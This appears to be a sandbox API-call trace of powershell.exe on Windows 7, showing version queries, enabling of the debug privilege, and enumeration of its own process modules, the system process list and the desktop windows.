	[0940.641] GetVersionExW (in: lpVersionInformation=0x18db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.643] GetVersionExW (in: lpVersionInformation=0x18db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.656] GetVersionExW (in: lpVersionInformation=0x18d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.657] SetErrorMode (uMode=0x1) returned 0x1
	[0940.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18da50 | out: lpFileInformation=0x18da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0940.659] SetErrorMode (uMode=0x1) returned 0x1
	[0940.662] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18dcc0 | out: lpdwHandle=0x18dcc0) returned 0x94c
	[0940.759] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b472f0 | out: lpData=0x2b472f0) returned 1
	[0940.761] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2b4738c, puLen=0x18dc30) returned 1
	[0940.763] lstrlenW (lpString="䅁") returned 1
	[0940.772] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b47468, puLen=0x18dba0) returned 1
	[0940.773] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0940.775] CoTaskMemAlloc (cb=0x2e) returned 0x3f9da0
	[0940.775] lstrcpyW (in: lpString1=0x3f9da0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0940.776] CoTaskMemFree (pv=0x3f9da0) 
	[0940.776] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b474bc, puLen=0x18dba0) returned 1
	[0940.776] lstrlenW (lpString="System.Management.Automation") returned 28
	[0940.776] CoTaskMemAlloc (cb=0x3c) returned 0x329860
	[0940.776] lstrcpyW (in: lpString1=0x329860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0940.776] CoTaskMemFree (pv=0x329860) 
	[0940.776] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b47518, puLen=0x18dba0) returned 1
	[0940.776] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0940.776] CoTaskMemAlloc (cb=0x20) returned 0x3f4ae0
	[0940.776] lstrcpyW (in: lpString1=0x3f4ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0940.776] CoTaskMemFree (pv=0x3f4ae0) 
	[0940.776] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b47558, puLen=0x18dba0) returned 1
	[0940.776] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0940.776] CoTaskMemAlloc (cb=0x44) returned 0x329860
	[0940.777] lstrcpyW (in: lpString1=0x329860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0940.777] CoTaskMemFree (pv=0x329860) 
	[0940.777] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b475c0, puLen=0x18dba0) returned 1
	[0940.777] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0940.777] CoTaskMemAlloc (cb=0x76) returned 0x39ad30
	[0940.777] lstrcpyW (in: lpString1=0x39ad30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0940.777] CoTaskMemFree (pv=0x39ad30) 
	[0940.777] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b4765c, puLen=0x18dba0) returned 1
	[0940.777] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0940.777] CoTaskMemAlloc (cb=0x44) returned 0x329860
	[0940.777] lstrcpyW (in: lpString1=0x329860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0940.777] CoTaskMemFree (pv=0x329860) 
	[0940.777] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b476c0, puLen=0x18dba0) returned 1
	[0940.777] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0940.777] CoTaskMemAlloc (cb=0x58) returned 0x3b07a0
	[0940.777] lstrcpyW (in: lpString1=0x3b07a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0940.777] CoTaskMemFree (pv=0x3b07a0) 
	[0940.777] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b4773c, puLen=0x18dba0) returned 1
	[0940.777] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0940.777] CoTaskMemAlloc (cb=0x20) returned 0x3f4ae0
	[0940.777] lstrcpyW (in: lpString1=0x3f4ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0940.777] CoTaskMemFree (pv=0x3f4ae0) 
	[0940.778] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x2b473e4, puLen=0x18dba0) returned 1
	[0940.778] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0940.778] CoTaskMemAlloc (cb=0x66) returned 0x3ef280
	[0940.778] lstrcpyW (in: lpString1=0x3ef280, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0940.778] CoTaskMemFree (pv=0x3ef280) 
	[0940.778] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x0, puLen=0x18dba0) returned 0
	[0940.778] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x0, puLen=0x18dba0) returned 0
	[0940.778] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18dba8, puLen=0x18dba0 | out: lplpBuffer=0x18dba8*=0x0, puLen=0x18dba0) returned 0
	[0940.778] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18db78, puLen=0x18db70 | out: lplpBuffer=0x18db78*=0x2b4738c, puLen=0x18db70) returned 1
	[0940.779] CoTaskMemAlloc (cb=0x204) returned 0x393fc0
	[0940.779] VerLanguageNameW (in: wLang=0x0, szLang=0x393fc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0940.781] CoTaskMemFree (pv=0x393fc0) 
	[0940.781] VerQueryValueW (in: pBlock=0x2b472f0, lpSubBlock="\\", lplpBuffer=0x18dbc8, puLen=0x18dbc0 | out: lplpBuffer=0x18dbc8*=0x2b47318, puLen=0x18dbc0) returned 1
	[0940.786] GetCurrentProcessId () returned 0x4b8
	[0940.896] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18caf0 | out: lpLuid=0x18caf0*(LowPart=0x14, HighPart=0)) returned 1
	[0940.899] GetCurrentProcess () returned 0xffffffffffffffff
	[0940.899] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18cb10 | out: TokenHandle=0x18cb10*=0x2dc) returned 1
	[0940.900] AdjustTokenPrivileges (in: TokenHandle=0x2dc, DisableAllPrivileges=0, NewState=0x2b4ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0940.902] CloseHandle (hObject=0x2dc) returned 1
	[0940.905] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b8) returned 0x2dc
	[0940.915] EnumProcessModules (in: hProcess=0x2dc, lphModule=0x2b4abd0, cb=0x200, lpcbNeeded=0x18db28 | out: lphModule=0x2b4abd0, lpcbNeeded=0x18db28) returned 1
	[0940.917] GetModuleInformation (in: hProcess=0x2dc, hModule=0x13f370000, lpmodinfo=0x2b4ae40, cb=0x18 | out: lpmodinfo=0x2b4ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0940.918] CoTaskMemAlloc (cb=0x804) returned 0x3fbfa0
	[0940.918] GetModuleBaseNameW (in: hProcess=0x2dc, hModule=0x13f370000, lpBaseName=0x3fbfa0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0940.918] CoTaskMemFree (pv=0x3fbfa0) 
	[0940.919] CoTaskMemAlloc (cb=0x804) returned 0x3fbfa0
	[0940.919] GetModuleFileNameExW (in: hProcess=0x2dc, hModule=0x13f370000, lpFilename=0x3fbfa0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0940.920] CoTaskMemFree (pv=0x3fbfa0) 
	[0940.920] CloseHandle (hObject=0x2dc) returned 1
	[0940.928] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x4b8) returned 0x2dc
	[0940.929] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0x18dc58 | out: lpExitCode=0x18dc58*=0x103) returned 1
	[0941.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b4b088, Length=0x20000, ResultLength=0x18dc20 | out: SystemInformation=0x12b4b088, ResultLength=0x18dc20*=0x4a000) returned 0xc0000004
	[0941.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b6b0b8, Length=0x4c800, ResultLength=0x18dc20 | out: SystemInformation=0x12b6b0b8, ResultLength=0x18dc20*=0x4a000) returned 0x0
	[0941.390] EnumWindows (lpEnumFunc=0x29466ac, lParam=0x0) 
	[0941.398] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.398] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x558
	[0941.398] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.398] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.398] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.398] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x538
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x778
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x778
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.399] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x460
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2440
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x24d8
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1aa4
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1ff0
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1a84
	[0941.400] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1fb0
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1e10
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x23a8
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1f24
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x21ec
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2320
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1fd4
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1880
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b18
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1d6c
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x233c
	[0941.401] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2368
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2124
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x22f0
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x22ac
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1cdc
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x10f0
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1f18
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x20a8
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2004
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1f88
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1f84
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2050
	[0941.402] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1e04
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1ecc
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1e64
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b58
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1e94
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1e28
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1df8
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1da8
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1c70
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x163c
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1a10
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x186c
	[0941.403] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1d74
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4c8
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1960
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1ce4
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b24
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x14e0
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x17f0
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x854
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1268
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1624
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b9c
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x16f4
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x145c
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x17d0
	[0941.404] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1d28
	[0941.405] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xcb8
	[0941.405] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1190
	[0941.405] GetWindow (hWnd=0x20614, uCmd=0x4) returned 0x0
	[0941.406] IsWindowVisible (hWnd=0x20614) returned 0
	[0941.406] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x3a8
	[0941.406] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1bd0
	[0941.406] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1bfc
	[0941.406] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1a78
	[0941.406] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b90
	[0941.406] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b04
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b34
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1b64
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1bb0
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1acc
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1a2c
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x19a8
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1944
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x18c8
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x18ac
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x18ec
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1898
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc98
	[0941.407] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x153c
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1808
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x12a4
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1740
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x16c4
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1820
